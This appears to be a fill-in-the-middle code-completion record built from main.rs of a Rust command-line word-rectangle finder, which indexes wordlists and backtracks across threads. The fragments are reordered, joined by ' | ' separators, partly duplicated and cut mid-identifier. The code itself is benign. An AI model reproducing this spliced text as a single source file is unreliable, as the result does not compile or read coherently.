CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!()) | .setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words_index(
f_in: impl BufRead,
ignore_unencodeable: bool,
) -> io::Result<(u32, u32, WordIndex)> {
let mut index = WordIndex::default();
let mut count_row_words = 0;
#[cfg(not(feature = "square"))]
let mut count_col_words = 0;
let lines = f_in.lines();
for line_result in lines {
let word = line_result?;
let chars:Vec<char> = word.chars().collect();
if chars.len() != WORD_SQUARE_WIDTH && chars.len() != WORD_SQUARE_HEIGHT { continue }
let mut codes = Vec::new();
let mut all_encoded = true;
for c in chars.clone() {
match encode(c) {
Some(code) => codes.push(code),
None => {
all_encoded = false;
continue
},
}
}
if !all_encoded {
if !ignore_unencodeable {
eprintln!("Skipping {:?}, not all could be encoded",chars);
}
continue
}
if codes.len() == WORD_SQUARE_WIDTH {
count_row_words += 1;
let words_index = index.rows_mut();
let mut word = WideWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_WIDTH {
let i = (WORD_SQUARE_WIDTH - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
#[cfg(not(feature = "square"))]
if codes.len() == WORD_SQUARE_HEIGHT {
count_col_words += 1;
let words_index = index.cols_mut();
let mut word = TallWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_HEIGHT {
let i = (WORD_SQUARE_HEIGHT - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
}
#[cfg(feature = "square")]
let count_col_words = count_row_words;
return Ok((count_row_words, count_col_words, index));
}
fn compute_command(args:&ArgMatches) -> io::Result<()> {
let loud = !args.is_present("quiet");
let ignore_empty_wordlist = args.is_present("ignore-empty-wordlist");
let ignore_unencodeable = args.is_present("ignore-unencodeable");
if loud {
eprintln!("Word square order is {}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT);
eprintln!("Start: creating index.");
}
let num_threads:u32 = args.value_of("threads").unwrap().parse().unwrap();
let plain_f = File::open(args.value_of("wordlist").unwrap())?;
let f = BufReader::new(plain_f);
let (count_row_words, count_col_words, index) = make_words_index(f, ignore_unencodeable)?;
if !ignore_empty_wordlist && (index.rows().is_empty() || index.cols().is_empty()) {
panic!("No words in wordlist!");
}
if loud {
eprintln!("Finished creating index, {} words x {} words.", count_row_words, count_col_words);
}
let (m2w_tx, m2w_rx) = spmc::channel::<(WordSquare,u8)>();
let (w2m_tx, w2m_rx) = std::sync::mpsc::sync_channel(16);
let mut worker_handles = Vec::new();
if loud {
eprintln!("Creating {} worker threads.", num_threads);
}
let index_arc = std::sync::Arc::new(index);
for _ in 0..num_threads {
let rxc = m2w_rx.clone();
let txc = w2m_tx.clone();
let my_index = std::sync::Arc::clone(&index_arc);
worker_handles.push(
thread::spawn( move || {
while let Ok(msg) = rxc.recv() {
compute(
&my_index,
msg.0,
msg.1,
WORD_SQUARE_SIZE as u8,
|a,b| txc.send((a,b)).unwrap()
);
}
})
);
}
drop(w2m_tx);
let printing_thread = thread::spawn(move || {
while let Ok(msg) = w2m_rx.recv() {
print_word_square(msg.0);
}
});
let code_array = [255u8; WORD_SQUARE_SIZE];
if loud {
eprintln!("Starting.");
}
compute(
index_arc.as_ref(),
code_array,
0u8,
WORD_SQUARE_WIDTH as u8,
|ca, idx| m2w_tx.send((ca,idx)).unwrap()
);
drop(m2w_tx);
//println!("Dropped");
for h in worker_handles {
h.join().unwrap();
//println!("Worker finished");
}
printing_thread.join().unwrap();
//println!("printing thread finished");
/*let mut char_counts:Vec<(char,u64)> = unused_chars.drain().collect();
char_counts.sort_unstable_by_key(|t| t.1);
for (k,v) in char_counts.iter() {
println!("Char {:?} had {} instances", k, v);
}*/
Ok(())
}
const DEBUG_MODE:bool = false;
fn compute<T:FnMut(WordSquare,u8)>(
words_index_arg:&WordIndex,
mut code_array:WordSquare,
start_idx:u8,
target_idx:u8,
mut on_result:T,
) {
let mut at_idx = start_idx;
let mut charset_array = [CharSet::new(std::u32::MAX); WORD_SQUARE_SIZE];
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
// wrap to go from 0 to 255
let end_idx = start_idx.wrapping_sub(1);
while at_idx != end_idx {
// wrap to go from 255 (initial) to 0
if DEBUG_MODE {
println!();
println!(
"idx {} before wrapping add is {}",
at_idx,
code_array[at_idx as usize]
);
}
code_array[at_idx as usize] = code_array[at_idx as usize].wrapping_add(1);
if DEBUG_MODE {
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
for row in 0..WORD_SQUARE_HEIGHT {
for col in 0..WORD_SQUARE_WIDTH {
print!("{}, ", decode(code_array[row*WORD_SQUARE_WIDTH + col]).unwrap());
}
println!();
}
println!("row_idx {}, col_idx {}", row_idx, col_idx);
}
let cur_code = code_array[at_idx as usize];
if DEBUG_MODE { println!("cur_code {}", cur_code); }
let cur_charset = charset_array[at_idx as usize];
if cur_code == 32 {
code_array[at_idx as usize] = 255u8;
at_idx = at_idx.wrapping_sub(1)
} else if cur_charset.has(cur_code) {
at_idx += 1;
if at_idx == target_idx {
//print_word_square(code_array);
(&mut on_result)(code_array, at_idx);
at_idx -= 1;
} else {
code_array[at_idx as usize] = 255;
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
//println!("row_word {:?}", row_word);
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
//println!("col_word {:?}", row_word);
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
}
}
}
} | .author(crate_authors!())
.about(crate_description!()) | random_line_split |
main.rs | //#![feature(exclusive_range_pattern)]
#![feature(nll)]
extern crate fnv;
extern crate spmc;
extern crate unicode_skeleton;
#[macro_use]
extern crate clap;
use std::default::Default;
use std::vec::Vec;
use std::io::{self, BufReader, BufWriter};
use std::io::prelude::*;
use std::fs::File;
use std::thread;
use fnv::FnvHashMap;
use unicode_skeleton::UnicodeSkeleton;
use clap::{Arg, App, SubCommand, ArgMatches};
macro_rules! make_encode_decode {
(
$( $num:expr => $char:expr; )+
) => {
fn encode(from:char) -> Option<u8> {
let res:u8 = match from {
$(
$char => $num,
)+
_ => return None,
};
return Some(res)
}
fn decode(code:u8) -> Option<char> {
let res:char = match code {
$(
$num => $char,
)+
255 => '#',
32 => '$',
_ => return None,
};
return Some(res)
}
}
}
make_encode_decode!{
0 => 'a';
1 => 'e';
2 => 'i';
3 => 'o';
4 => 'r';
5 => 'n';
6 => 'l';
7 => 's';
8 => 't';
9 => 'u';
10 => 'p';
11 => 'c';
12 => 'd';
13 => 'k';
14 => 'y';
15 => 'g';
16 => 'h';
17 => 'b';
18 => 'v';
19 => 'f';
20 => 'w';
21 => 'z';
22 => 'j';
23 => 'x';
24 => '\'';
25 => '-';
26 => 'è';
27 => 'ê';
28 => 'ñ';
29 => 'é';
30 => 'm';
31 => 'q';
}
#[derive(Debug,Clone,Copy,PartialEq,Eq)]
struct CharSet {
pub internal:u32
}
impl CharSet {
fn new( | ernal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!())
.author(crate_authors!())
.about(crate_description!())
.setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words_index(
f_in: impl BufRead,
ignore_unencodeable: bool,
) -> io::Result<(u32, u32, WordIndex)> {
let mut index = WordIndex::default();
let mut count_row_words = 0;
#[cfg(not(feature = "square"))]
let mut count_col_words = 0;
let lines = f_in.lines();
for line_result in lines {
let word = line_result?;
let chars:Vec<char> = word.chars().collect();
if chars.len() != WORD_SQUARE_WIDTH && chars.len() != WORD_SQUARE_HEIGHT { continue }
let mut codes = Vec::new();
let mut all_encoded = true;
for c in chars.clone() {
match encode(c) {
Some(code) => codes.push(code),
None => {
all_encoded = false;
continue
},
}
}
if !all_encoded {
if !ignore_unencodeable {
eprintln!("Skipping {:?}, not all could be encoded",chars);
}
continue
}
if codes.len() == WORD_SQUARE_WIDTH {
count_row_words += 1;
let words_index = index.rows_mut();
let mut word = WideWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_WIDTH {
let i = (WORD_SQUARE_WIDTH - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
#[cfg(not(feature = "square"))]
if codes.len() == WORD_SQUARE_HEIGHT {
count_col_words += 1;
let words_index = index.cols_mut();
let mut word = TallWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_HEIGHT {
let i = (WORD_SQUARE_HEIGHT - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
}
#[cfg(feature = "square")]
let count_col_words = count_row_words;
return Ok((count_row_words, count_col_words, index));
}
fn compute_command(args:&ArgMatches) -> io::Result<()> {
let loud = !args.is_present("quiet");
let ignore_empty_wordlist = args.is_present("ignore-empty-wordlist");
let ignore_unencodeable = args.is_present("ignore-unencodeable");
if loud {
eprintln!("Word square order is {}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT);
eprintln!("Start: creating index.");
}
let num_threads:u32 = args.value_of("threads").unwrap().parse().unwrap();
let plain_f = File::open(args.value_of("wordlist").unwrap())?;
let f = BufReader::new(plain_f);
let (count_row_words, count_col_words, index) = make_words_index(f, ignore_unencodeable)?;
if !ignore_empty_wordlist && (index.rows().is_empty() || index.cols().is_empty()) {
panic!("No words in wordlist!");
}
if loud {
eprintln!("Finished creating index, {} words x {} words.", count_row_words, count_col_words);
}
let (m2w_tx, m2w_rx) = spmc::channel::<(WordSquare,u8)>();
let (w2m_tx, w2m_rx) = std::sync::mpsc::sync_channel(16);
let mut worker_handles = Vec::new();
if loud {
eprintln!("Creating {} worker threads.", num_threads);
}
let index_arc = std::sync::Arc::new(index);
for _ in 0..num_threads {
let rxc = m2w_rx.clone();
let txc = w2m_tx.clone();
let my_index = std::sync::Arc::clone(&index_arc);
worker_handles.push(
thread::spawn( move || {
while let Ok(msg) = rxc.recv() {
compute(
&my_index,
msg.0,
msg.1,
WORD_SQUARE_SIZE as u8,
|a,b| txc.send((a,b)).unwrap()
);
}
})
);
}
drop(w2m_tx);
let printing_thread = thread::spawn(move || {
while let Ok(msg) = w2m_rx.recv() {
print_word_square(msg.0);
}
});
let code_array = [255u8; WORD_SQUARE_SIZE];
if loud {
eprintln!("Starting.");
}
compute(
index_arc.as_ref(),
code_array,
0u8,
WORD_SQUARE_WIDTH as u8,
|ca, idx| m2w_tx.send((ca,idx)).unwrap()
);
drop(m2w_tx);
//println!("Dropped");
for h in worker_handles {
h.join().unwrap();
//println!("Worker finished");
}
printing_thread.join().unwrap();
//println!("printing thread finished");
/*let mut char_counts:Vec<(char,u64)> = unused_chars.drain().collect();
char_counts.sort_unstable_by_key(|t| t.1);
for (k,v) in char_counts.iter() {
println!("Char {:?} had {} instances", k, v);
}*/
Ok(())
}
const DEBUG_MODE:bool = false;
fn compute<T:FnMut(WordSquare,u8)>(
words_index_arg:&WordIndex,
mut code_array:WordSquare,
start_idx:u8,
target_idx:u8,
mut on_result:T,
) {
let mut at_idx = start_idx;
let mut charset_array = [CharSet::new(std::u32::MAX); WORD_SQUARE_SIZE];
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
// wrap to go from 0 to 255
let end_idx = start_idx.wrapping_sub(1);
while at_idx != end_idx {
// wrap to go from 255 (initial) to 0
if DEBUG_MODE {
println!();
println!(
"idx {} before wrapping add is {}",
at_idx,
code_array[at_idx as usize]
);
}
code_array[at_idx as usize] = code_array[at_idx as usize].wrapping_add(1);
if DEBUG_MODE {
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
for row in 0..WORD_SQUARE_HEIGHT {
for col in 0..WORD_SQUARE_WIDTH {
print!("{}, ", decode(code_array[row*WORD_SQUARE_WIDTH + col]).unwrap());
}
println!();
}
